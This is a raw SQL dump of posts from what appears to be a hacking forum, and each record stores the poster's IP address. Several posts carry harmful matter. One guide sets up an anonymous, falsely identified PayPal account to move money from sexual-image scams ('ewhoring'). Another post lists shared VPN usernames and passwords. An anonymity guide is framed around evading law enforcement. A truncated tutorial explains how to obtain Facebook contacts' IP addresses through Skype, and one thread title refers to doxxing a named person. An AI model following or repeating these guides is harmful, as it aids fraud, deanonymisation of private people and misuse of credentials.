'This talk makes me hungry :(', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', 'df4a9ab3c2b1883d233ab2c28b4b766d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5569', '989', '5544', '68', 'RE: Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '62', 'R?????zo?', '1350638238', 'Nice tutorial, thanks for sharing. Keep it up.', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '828d544ff7607dc043c78d40d9107ca8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5570', '988', '5543', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '62', 'R?????zo?', '1350638283', 'Thanks for sharing, didn\'t knew this.', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '1e7b8ed532e2a788dc91651df26154f0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5571', '987', '5542', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '62', 'R?????zo?', '1350638369', 'Looks good, thanks for sharing. Keep it up.', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', 'd5bc1e85e0ba12deddb82d58a8e2758e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5572', '986', '5535', '24', 'RE: What VM do you use and why?', '0', '62', 'R?????zo?', '1350638464', 'I used VMware back then, but my brother always liked Oracle (i think its called like that)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '5d2bcbf8c83efaa9e6931262ef2afb67', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5573', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '62', 'R?????zo?', '1350638519', 'Keep it up bro, nice share ;)', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', '6c9c0ab2d9b41d430999be124740d199', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5574', '987', '5571', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '258', 'PiXEL^OG', '1350639042', '[quote=\'R?????zo?\' pid=\'5571\' dateline=\'1350638369\'] Looks good, thanks for sharing. Keep it up. [/quote] Your welcome mate :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'b8be3d856983ff8a551df9bf3e3e88ba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5575', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '53', 'sirchamp', '1350640448', 'Beeing banned of HF must be really fucked up.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'e06e3cc1d5032dd7667dd66c17903927', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5576', '906', '4982', '42', 'RE: DOX of Kody Maxson', '0', '62', 'R?????zo?', '1350641378', 'My thread gets deleted on HF, i think they don\'t allow Dox', '77.54.39.106', '1295394666', '1', '0', '0', '0', '1', 'dfee09ae90597a9510e7267e17e34d28', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5577', '983', '5573', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '257', 'XxTREYZxX', '1350641818', '[quote=\'R?????zo?\' pid=\'5573\' dateline=\'1350638519\'] Keep it up bro, nice share ;) [/quote] no worries enjoy them :O', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'ddd8670ac7d38458faf643c56f27cf50', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5578', '889', '4842', '3', 'RE: Vote for a new theme', '0', '53', 'sirchamp', '1350641841', 'I dont like any of them. Why do we need a new theme?', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'd699b9197f70e71079251153cfbb7d1e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5579', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350641914', 'its prob because of you version, this version is 1.3.1', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', 'c6ae6d8315473b4fca7fed581d7014be', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5580', '126', '5093', '15', 'RE: Adf.ly Bot', '0', '53', 'sirchamp', '1350646096', '[quote=\'iTzIpod\' pid=\'5093\' dateline=\'1350475124\'] Wait so this works 100% virus free? And should I run it in Sandboxie? [/quote] 100% Virusfree. You do NOT have to run it in Sandboxie.', '48.40.189.25', '807976217', '1', '0', '0', '0', '1', 'f7e9495f5cb525fc37876f33019d0463', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5581', '986', '5572', '24', 'RE: What VM do you use and why?', '0', '205', 'mothered', '1350647515', '[quote=\'R?????zo?\' pid=\'5572\' dateline=\'1350638464\'] I used VMware back then, but my brother always liked Oracle (i think its called like that) [/quote] Yes, VMware Is certainly the most superior. Oracle Is \"VirtualBox\", and just like Virtual PC 2007, Is available as a freeware download. This too, Is a pretty good VM.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '375587947baad9e0e681ce38f022d8e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5582', '973', '5454', '19', '[Junk]New HF Logo?', '0', '61', 'NXK', '1350647984', 'This thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5583', '981', '5480', '4', 'RE: Whatsup Holmes.', '0', '61', 'NXK', '1350648080', 'Welcome, Enjoy it and stay HQ.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '4eeec5bfa0fdc579d690dcb643edec0d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5584', '918', '5088', '65', 'RE: I feel famous', '0', '205', 'mothered', '1350648371', 'That\'s Insane, a free fall that reached over 1,100km/h. I\'d have a heart attack at that speed.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '858be7aa3d7cdde2ac99788d653d5f59', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5585', '988', '5543', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '228', 'VirtualLegend', '1350648440', 'Nice Tutorial, How did you know that ;) Keep it Up', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'e0761fcce8e95bf03e3516166b096032', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5586', '907', '5528', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '2', 'Apathy', '1350649045', '[quote=\'??????????¢™\' pid=\'5528\' dateline=\'1350619527\'] [quote=\'Apathy\' pid=\'5527\' dateline=\'1350617582\'] Not bad. I like someone else footage better though. [/quote] Thats okay with me, I didnt do a pro edit because im not an editor just a gamer. [/quote] I meant their is better camera footage.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '5b8cf77c81aa46c45e4106373b1c9d38', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5587', '988', '5585', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '258', 'PiXEL^OG', '1350649275', '[quote=\'VirtualLegend\' pid=\'5585\' dateline=\'1350648440\'] Nice Tutorial, How did you know that ;) Keep it Up [/quote] Its just a trick i picked up along the way! :) Ive been in all kinds of hacking fields for 2 years learnt almost all there is to know for the most part , and i ain\'t even 17 yet [hr] Also Thanks Virtual and Reloadzor for the feedback :D', '139.190.235.246', '-1950422026', '0', '0', '258', '1350649308', '1', '0aa8f63662e9e2e68467661fa3af28f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5588', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '62', 'R?????zo?', '1350650040', 'yeah I can\'t get it to work.', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', 'e13c7b93b0a3dd83d2bda447ec705fc0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5589', '988', '5543', '12', 'RE: [TUT] Watch +18 Youtube Videos Without an Account', '0', '62', 'R?????zo?', '1350650104', 'No worries, repped you :)', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', 'fbf6ee27267086e19dfd8d9f65c3cf45', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5590', '986', '5535', '24', 'RE: What VM do you use and why?', '0', '62', 'R?????zo?', '1350650166', 'yeah VMware is awesome, my teacher recommend it to me so.', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', '1eb4092d2dbf934b12ec22771aaca9f7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5591', '126', '315', '15', 'RE: Adf.ly Bot', '0', '62', 'R?????zo?', '1350650229', 'Nice, thanks for sharing this, I will use this one then. Heard some nice feedback about this bot :)', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', 'dbd7b01c35e14b796031950167a45052', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5592', '991', '0', '14', 'VPN Accounts With Guide :)', '0', '62', 'R?????zo?', '1350650722', '[align=center] GUIDE TO SETUP VPN : Open up network and sharing center from Control Panel, and choose Set up a new connection or network. [img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image.png[/img] There are two options in the Connect to a Workplace window. 99% of the time you just need to pick the first option, unless your company only allows you to dial in using a phone line. [img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image1.png[/img] Type in the address in either domain name or IP address, and name the connection in the destination name box. And click Next. [img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image2.png[/img] You can leave all user login info blank if you feel safe that way in the next window. And click Create. You’re all set if you see the next window as below. [img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image3.png[/img] To launch it, simply click the small network icon on the system tray at the bottom right corner, and pick the connection we just created from the popup list, and connect. [img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image4.png[/img] Type in your user name and password, and you are on your way connecting your Windows 7 to your company network. [img]http://www.windows7hacker.com/wp-content/uploads/2009/08/image5.png[/img] [color=#FF0000][size=x-large]Link address:vpn1.sshour.com Username: sshour1 Password: 8cfba3 Location : U.S.A-Fremont Link address:vpn2.sshour.com Username: sshour2 Password: 567c3m Location : U.S.A-Los angeles Link address:vpn3.sshour.com Username: sshour3 Password:vi64y5 Location :U.S.A-San jose Link address:vpn4.sshour.com Username: sshour4 Password:246jk5 Location :U.S.A-Seattle Link address:vpn5.sshour.com Username: sshour5 Password:t1bn89 Country:U.S.A-Kansas Link address:vpn6.sshour.com Username: sshour6 Password:3nzeha Location :Switzerland-Estonia [/size][/color] [/align]', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', '6212d32c830630e43120c59c46506511', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5593', '992', '0', '17', '[GUIDE] Verifying a PayPal Account FREE+ANONYMOUSLY', '0', '62', 'R?????zo?', '1350650947', '[b][color=#FF0000]*You can only do this once on the same IP, use proxies/VPN to make multiple cards*[/color][/b] I thought I may as well make a little tutorial. The most important part of ewhoring is staying anonymous and making money, right? Right. The trouble of making a new PayPal account is that they try to make it hard for you to stay anonymous. I\'ll show you real quick how to obtain a free virtual visa to use with your ewhoring paypal account, so you can send the money you\'ve earned to your main paypal account. Since some people can\'t get entropay to work for them or they\'re saying it\'s patched or whatever, http://www.siteslike.com/similar/entropay.com 1. Go to https://www.entropay.com/ 2. Click \'Sign up now!\' on the right 3. Fill in the forms (Use fake info, you\'re trying to be anonymous) 4. Now it\'ll ask you if you want to fund your account with a credit card or a bank account, choose bank account 5. Now it\'ll bring you to a screen with your virtual credit card details and a form below it giving you the option to load money onto it. 6. Go to PayPal and find somewhere where it states your limits and select \'Lift limits\' 7. Enter in the credit card details from entropay 8. Verify your paypal account It\'s that simple :) When you get the money onto your ewhore account, send it to a secondary account right away and let it sit for a couple of days and then transfer it to your main paypal account. I\'ve found this to be the most successful way in avoiding limitations on your account that matters. [align=center][size=xx-small]All content posted in this thread is for educational purposes ONLY, I the poster am not responsible for what readers do with this information.[/size][/align]', '89.214.163.182', '1507238838', '1', '0', '62', '1350651029', '1', '15954141b809c285f9c4342e50025760', '0', '1350651029'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5594', '922', '5338', '9', 'RE: ???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '270', 'LCS', '1350651248', '[quote=\'?(???)?TREYZ?(???)?\' pid=\'5338\' dateline=\'1350555393\'] [quote=\'LCS\' pid=\'5337\' dateline=\'1350554787\'] [quote=\'?(???)?TREYZ?(???)?\' pid=\'5323\' dateline=\'1350552748\'] looks great i\'m definitely gonna try it out :) [/quote] Thanks! I hope you enjoy it! :) [/quote] i will enjoy and hope it turns out good:) [/quote] Have a review you could post for our users? :)', '2.124.223.31', '41738015', '1', '0', '0', '0', '1', '14ec9e2b96ed55a9c7fffc01fada44b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5595', '993', '0', '12', 'Most complete guide to be anonymous', '0', '62', 'R?????zo?', '1350651294', '[align=center]Hello L33t Hacking, Here is my first full guide to remain almost COMPLETELY if not FULLY anonymous on the Internet. This guide will be simple, pro, and straight to the point.[/align] [align=center][color=#9400D3][size=large]?????[/size][/color][/align] [align=center][size=large][b][color=#000000]?[/color][/b][b][color=#FFD700] Social engineering and your behavior [/color][/b][b][color=#000000]?[/color][/b][/size][/align] [align=center] [color=#00BFFF][b]Basic rule:[/b][/color] Blend in with the crowd, disperse into the stream. Keep a low profile. Don\'t try to be special. Don\'t try to be a smart ass. Feds are many. Heroes only exist in comic books keep that in mind! There are no old heroes; there are only young heroes and dead heroes.[/align] [color=#FF0000]DO NOT:[/color] [list] [*]Include personal information in your screen name. [/list] [list] [*]Discuss personal information, your address or where you\'re from. [/list] [list] [*]Mention your gender, tattoos, scars, piercings, body modifications, your weight or your physical and/or psychological capacities (got the idea?). [/list] [list] [*]Mention your profession or hobbies or involvement in other activist groups. [/list] [list] [*]Mention whether you\'re in a relationship. [/list] [list] [*]Use special characters, which are existent only in your language, as they would reveal where you are from. [/list] [list] [*]Give even bogus info. Lot\'s of no\'s, make a yes. [/list] [list] [*]Blend anything from your real life. [/list] [list] [*]Mention congresses that you have been at, schools or universities, etc. [/list] [list] [*]Mention your time zone, this can reveal where you live. [/list] [list] [*]Connect at the same time regularly. Try to alternate. [/list] [list] [*]Post on the public net while you are in the IRC, and definitely do not mention that you are posting something on Twitter. This is easy to correlate. Stagger your login & log out times on FaceBook, Twitter & IRC. [/list] [list] [*]Discuss whether you are personally DDoSing or writing How-To’s or making graphics etc. or not, just discuss general strategy. [/list] [list] [*]Post pictures hosted on Facebook. The filename contains your profile ID. [/list] [align=center][color=#9400D3][size=large]?????[/size][/color][/align] [align=center] [size=large][b][color=#000000]?[/color][/b][b][color=#FFD700] Technical [/color][/b][b][color=#000000]?[/color][/b][/size][/align] [align=center]I am personally using Firefox. Google Chrome to me is shit and I\'ve had a few problems before. Firefox is the BEST. Useful [b](mandatory)[/b] plugins/extensions for Firefox. You [b][color=#FFD700]MUST[/color][/b] have these. [/align] [size=medium] [size=small][align=center][b]I personally use all these plugins, they are excellent.[/b][/align][/size] [list] [*][color=#00BFFF]Plugins & extensions for Firefox[/color] [/list][/size] [color=#FFA500]Better Privacy[/color] (Removes persistent cookies from flash stuff >> *.sol) https://addons.mozilla.org/fr/firefox/addon/betterprivacy/ [color=#FFA500]NoScript[/color] (blocks Javascript) https://addons.mozilla.org/fr/firefox/addon/noscript/ [color=#FFA500]AdBlock Plus[/color] (blocks Ads) https://addons.mozilla.org/fr/firefox/addon/adblock-plus/?src=search [color=#FFA500]Element Hider for Adblock Plus[/color] https://addons.mozilla.org/fr/firefox/addon/elemhidehelper/?src=search [color=#FFA500]Ghostery[/color] (Protect your privacy. See who\'s tracking your web browsing and block them with Ghostery) https://addons.mozilla.org/fr/firefox/addon/ghostery/?src=search [color=#FFA500]TACO[/color] (More adblocking) https://addons.mozilla.org/fr/firefox/addon/beef-taco-targeted-advertising/?src=search [color=#FFA500]RefControl[/color] (Control what gets sent as the HTTP Referer on a per-site basis.) https://addons.mozilla.org/fr/firefox/addon/refcontrol/?src=search [color=#FFA500]WorldIP[/color] (flag and datacenter, ping and traceroute)[/color] (REAL location of web server,IP,Datacenter,Ping,Traceroute,RDNS,AS. Often shows different countries from similar add-ons,because it is based on data from core routers worldwide,and not on whois data.Real Google\'s data centers. Providers looking glasses.) https://addons.mozilla.org/fr/firefox/addon/worldip-flag-and-datacenter-pi/?src=search [color=#FFA500]Flagfox[/color] (Shows the flag of the website) https://addons.mozilla.org/fr/firefox/addon/flagfox/?src=search [color=#FFA500]GoogleSharing [/color](GoogleSharing provides a level of anonymity that will prevent google from tracking your searches and web activity.) https://addons.mozilla.org/fr/firefox/addon/googlesharing/?src=search [color=#FFA500]Scroogle.org[/color] (lets you search with Google anonymously). https://addons.mozilla.org/fr/firefox/addon/scroogle-ssl-search/?src=search [color=#FFA500]User Agent Switcher[/color] (Sends bogus browser identity to servers.) https://addons.mozilla.org/fr/firefox/addon/user-agent-switcher/?src=search [color=#FFA500]HTTPS Finder[/color] HTTPS Finder automatically detects and enforces HTTPS connections when available. It also provides one-click creation and in-browser editing for HTTPS Everywhere rules. https://addons.mozilla.org/fr/firefox/addon/https-finder/?src=search [color=#FFA500]Download TOR[/color] Download Torbutton for Firefox (enable or disable the browser\'s use of Tor) https://www.torproject.org/torbutton [color=#00BFFF]• [/color]Make sure your cached data is securely destroyed before re-starting firefox by the following \'debug\' procedure - you\'ll need to go to Start > Run and then open \'cmd\' for Command Prompt. [align=center][img]http://i.imgur.com/39etf.png[/img][/align] [align=center][color=#9400D3][size=large]?????[/size][/color][/align] [align=center][b][color=#00BFFF]Basic Rule:[/color][/b] Use as many security layers as possible. The question is not whether you are paranoid, but whether you are paranoid enough? A good start is to use a VPN A proxy will also do, but it is not as secure as a VPN. Always use as many security layers as possible. Make sure to use them in the right way. If you don\'t know how to use them, learn first. [/align] [align=center][size=large][b][color=#FFD700] VPN [/color][/b][/size][/align] [align=justify]When thinking of a VPN service, think first about the legislation of the country. A USA VPN might provide user data upon warrant issue. In other countries such as Sweden and Iceland, this is unlikely to happen. They have a strong privacy policy, which makes it harder for law enforcement agencies to get access. In addition, some servers do not keep logs of users. Also try to get VPN services that accept anonymous payments (For those that keep user billing information)[/align] [color=#00BFFF][b]More info:[/b][/color] https://secure.wikimedia.org/wikipedia/en/wiki/Vpn Free VPNs - [color=#FF0000]Not recommended.[/color] If they aren\'t selling you a service [size=medium][b]they are selling you.[/b][/size] [b] [color=#FF0000]Red List[/color][/b] [list] [*] http://cyberghostvpn.com [/list] [list] [*] http://hotspotshield.com - Occasionally hijacks your traffic to redirect you to advertisers. [/list] [list] [*] http://proxpn.com [/list] [list] [*] https://anonymityonline.org [/list] [size=medium][list] [*][color=#00BFFF][b]Use the proxies in conjunction with a VPN. [/b][b][color=#FFD700]*IMPORTANT*[/color][/b][/color] [/list][/size] [b][color=#FFA500]Proxies[/color][/b] 1- http://www.freeproxies.org 2- http://www.socks24.org 3- http://www.samair.ru/proxy [b][color=#FFA500]VPN [/color][/b] http://cyberghostvpn.com http://hotspotshield.com http://proxpn.com https://anonymityonline.org http://www.swissvpn.net http://perfect-privacy.com https://www.ipredator.se http://www.anonine.se https://www.vpntunnel.se http://www.bestfreevpn.com http://www.your-freedom.net http://www.ultravpn.fr http://www.itshidden.com http://www.thefreevpn.com http://www.packetix.net [b][color=#FFA500]Commercial VPN providers[/color][/b] http://www.swissvpn.net http://perfect-privacy.com https://www.ipredator.se http://www.anonine.se https://www.vpntunnel.se http://www.relakks.com http://www.steganos.com http://www.bananavpn.net > [color=#FFA500]logs IPs[/color] http://www.strongvpn.com > [color=#FFA500]logs IPs [/color] http://www.secureix.com http://www.secretsline.com [align=center][color=#9400D3][size=large]?????[/size][/color][/align] [b][align=center] [color=#FFD700]Portable Software[/color][/align][/b] [align=justify] Portable software is a software which you can run from an USB drive, so that it leaves almost no traces on your computer.[/align] [list] [*] http://portableapps.com [/list] [list] [*] http://portableapps.com/apps/internet/firefox_portable [/list] [list] [*] http://portable-i2p.blogspot.com [/list] [b] NOTE: [/b] I will not go into details in here as I never tried it but it is a really good information to know. [align=center][color=#9400D3][size=large]?????[/size][/color][/align] [align=center][color=#FFD700][b]Privacy Box[/b][/color][/align] The PrivacyBox provides non-tracked (and also anonymous) contact forms. It is running primarily for journalists, bloggers and other publishers. But it is open for other people too. Think about an electronic mailbox. https://privacybox.de/index.en.html [align=center][color=#9400D3][size=large]?????[/size][/color][/align] [color=#FFD700][b][align=center]System Safety[/align][/b][/color] [align=center][color=#00BFFF][b]Basic rule:[/b][/color] Security is a continuing process, not a state. Do audits on a regular and scheduled basis. And do encrypted backups. Backups are important, as there are two types of people, those who have backups and those who have lost their data.[/align] [b] Use the operating system you are familiar with (Linux and Unix are better though)[/b] [list] [*] Uninstall everything you not need. [/list] [list] [*]Disable all remote tools. [/list] [list] [*]Shred or encrypt /temp, /var/temp and all world-readable files. [/list] [list] [*] Use Linux for activism purposes. Inside Linux use virtual machines. Use truecrypt + removable devices + hidden volumes if you plan on reusing a virtual machine more than once. - This is just for those who have knowledge of Linux. [/list] [list] [*]Encrypt your hard disk ( [color=#32CD32]Truecrypt: [/color]http://www.truecrypt.org ) [/list] [list] [*] Never ever keep logs. [/list] [list] [*] If you detect any unwanted activity INSIDE your computer, shut down the Internet, and reinstall everything. [/list] [list] [*] If you think your router might have been hacked, contact your ISP at once, reset it, and/or reinstall its firmware or buy a new one. [/list] I hope that you guys found this \'\'tutorial\'\' made by me useful, as it is intended to be with information that are trustworthy. This tutorial took me 5 hours to make to make it as much complete as possible, a vouch is appreciated :) Feel free to ask anything, for any changes, PM ME. [color=#000000][b] STAY ANONYMOUS[/b][/color][color=#FF1493]~[/color] credits: -NerdsLegend', '89.214.163.182', '1507238838', '1', '0', '62', '1350682319', '1', '7ebbafce50ca650d4c120cece4528332', '0', '1350682319'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5632', '996', '5622', '19', '[Junk]1000 PREMIUM ACCOUNTS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!', '0', '228', 'VirtualLegend', '1350684281', 'This thread has been junked.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5596', '994', '0', '18', 'Getting IP\'s of Facebook contacts! [TUT]', '0', '62', 'R?????zo?', '1350651631', '[b][color=#1E90FF]Hey guys!I\'ll be showing you how to get the IP of someone that you don\'t have as a contact on Skype, AIM, MSN etc, but you have them on Facebook. Although this method uses Skype to get their IP.[/color][/b] [b][color=#32CD32]Step 1 - The first thing you wanna do is open your Skype, click the arrow next to All at the top of your contacts list and you get a drop down menu. Then click Facebook.[/color][/b] [color=#FF0000][b][spoiler][IMG]http://img803.imageshack.us/img803/7735/a49a0a8b84f54d4d84ec424.png[/IMG][/spoiler][/b][/color] [color=#32CD32][b]Step 2 - Now you see you can connect to Facebook. Click the button saying Connect to Facebook. In your Skype window you will now see a login page for Facebook. All you do now is log in, then go back to the drop down menu from step one and click Facebook again to re-load. [color=#FF0000](No picture for this part as it\'s pretty easy to figure out)[/color] Step 3 - You should now see all your Facebook contacts. What you now want to do is separate your main Skype window where your chats are, from your 